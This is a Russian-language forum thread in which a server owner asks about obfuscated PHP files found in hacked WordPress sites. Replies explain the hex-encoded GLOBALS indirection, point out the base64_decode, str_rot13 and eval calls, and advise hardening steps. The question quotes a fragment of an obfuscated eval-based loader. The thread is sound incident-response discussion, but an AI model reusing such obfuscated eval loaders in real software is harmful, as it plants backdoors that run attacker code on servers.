Столкнулся впервые с такими скриптами, не могу понять что это и что оно делает. Нагуглить объяснения тоже не выходит. Похоже какой-то вредоносный, но как он работает? Кусок кода: PHP: <?php goto b411d; e99e7: ${${"\x47\x4c\x4f\x42\101\x4c\123"}["\x6b\x71\153\153\151\161\x79\x67\152\151\x69"]} = "\172"; goto bfd51; F940b: eval(${${"\107\114\x4f\102\101\114\x53"}["\146\155\x6b\161\153\160\x79\x69"]}(${${"\x47\114\x4f\102\101\x4c\x53"}["\157\x63\142\x63\x6d\x63\142\x67\157\x66\x64"]}(${${"\x47\x4c\117\x42\101\114\123"}["\153\x63\x65\166\157\150\x78\x78\156\156\x6c"]x74"))));
Добрый день и с Новым Годом! Работает это так: PHP: <? // где-то в полном коде определятся глобальная переменная, которой // присваивается название другой переменной, например, "test" ${"GLOBALS"}["kqkkiqygjii"]="test"; // в фрагменте кода ${"\x47\x4c\x4f\x42\101\x4c\123"}["\x6b\x71\153\153\151\161\x79\x67\152\151\x69"] // это запись ${"GLOBALS"}["kqkkiqygjii"] echo (${"\x47\x4c\x4f\x42\101\x4c\123"}["\x6b\x71\153\153\151\161\x79\x67\152\151\x69"]); // output: test echo "<br>"; // в фрагменте кода ${${"\x47\x4c\x4f\x42\101\x4c\123"}["\x6b\x71\153\153\151\161\x79\x67\152\151\x69"]} = "\172"; // работает также как // ${${"GLOBALS"}["kqkkiqygjii"]} = "z"; echo ${${"GLOBALS"}["kqkkiqygjii"]}; // output: z ?> Из этого следует, что этот код исполняемый, но зарыто в нём может быть, что угодно. При большом желании в нём можно разобраться декодировав на сервисе https://www.unphp.net/ Если Вы нашли его в какой-то CMS, то возможно разработчики специально закодировали код, но это маловероятно т.к. должно тормозить исполнение кода. Советую Вам сделать dump и потом полностью удалить этот "загадочный" код. Если всё будет работь нормально, значит это был какой-то вредоносный. Удачи!
Спасибо, Вас тоже с Новым годом! Файлы с подобными скиптами появились в Wordpress, но их там точно быть не должно. А ещё файл с таким скриптом нашёл в одном из каталогов сервера, отдельно от сайтов. Ну это точно вредоносные скрипты, с сервера посыпался спам. Вот так этот файл выгладит целиком https://www.unphp.net/decode/02fbe02807a16d933f3436c0c426ac6d/ Вот теперь понятно, что это просто закодированный код PHP. Дальше я уже наверное разберу что там за скрипты и что они делают. Благодарю!
Тебя взломали и одним лишь удалением зловредного кода не обойтись. В этом говне: base64_decode - передадут зловредный код (декодированный) str_rot13 - шифрование и сокрытие от просмотра кода eval - выполнение кода т.е. любой произвольный код будет выполнен. Как минимум, функцию eval нужно вообще запретить в системе. disable_functions в php.ini Что там тебе в систему могли загрузить - бог его знает. Я бы сразу её снес и переустановил. Пользователь не должен выходить за пределы своей папки с сайтом, тогда тут бы ты себя наиболее обезопасил. Простое удаление этого файла ни к чему не приведут, ни сегодня так завтра тебя ломанут снова ибо зловред в системе 100% + вероятнее всего дыра в движке. Не исключено, что сам сервер настроен криво и например папка "temp" для загрузки изображений и/или других файлов позволяет выполнять php код. Нужно запретить. Все что не нужно пользователю - вынести за пределы каталога web
Это уже понятно, потому что попытки восстановления сайтов из бэкапов были, с полным удалением заражённых. Вот и пытаюсь разобраться что теперь делать. Ну вообще это выделенный сервер (с админкой ISPmanager) и изначально там был 1 пользователь (www-root) для сайтов, отдельный от root. Потом несколько сайтов заразилось и на www-root прям на глазах в корнях сайтов начали появляться вредоносные файлы. Все пароли на сервере поменялись, были созданы нескольких новых пользователей, из старых бэкапов восстановили сайты под новыми пользователями. Всё было обновлено до последней версии и движки и плагины. И долгое время была тишина, а потом и на новых пользователях началась эпидемия. Я даже не знаю куда копать, где этот источник заражения. Тут моя компетенция всё.
--- Добавлено --- --- Добавлено --- У меня был похожий случай. Kлиенту, кто-то сделал сайт на Joomla. Все эти муки закончились тем, что он попросил переписать сайт без CMS.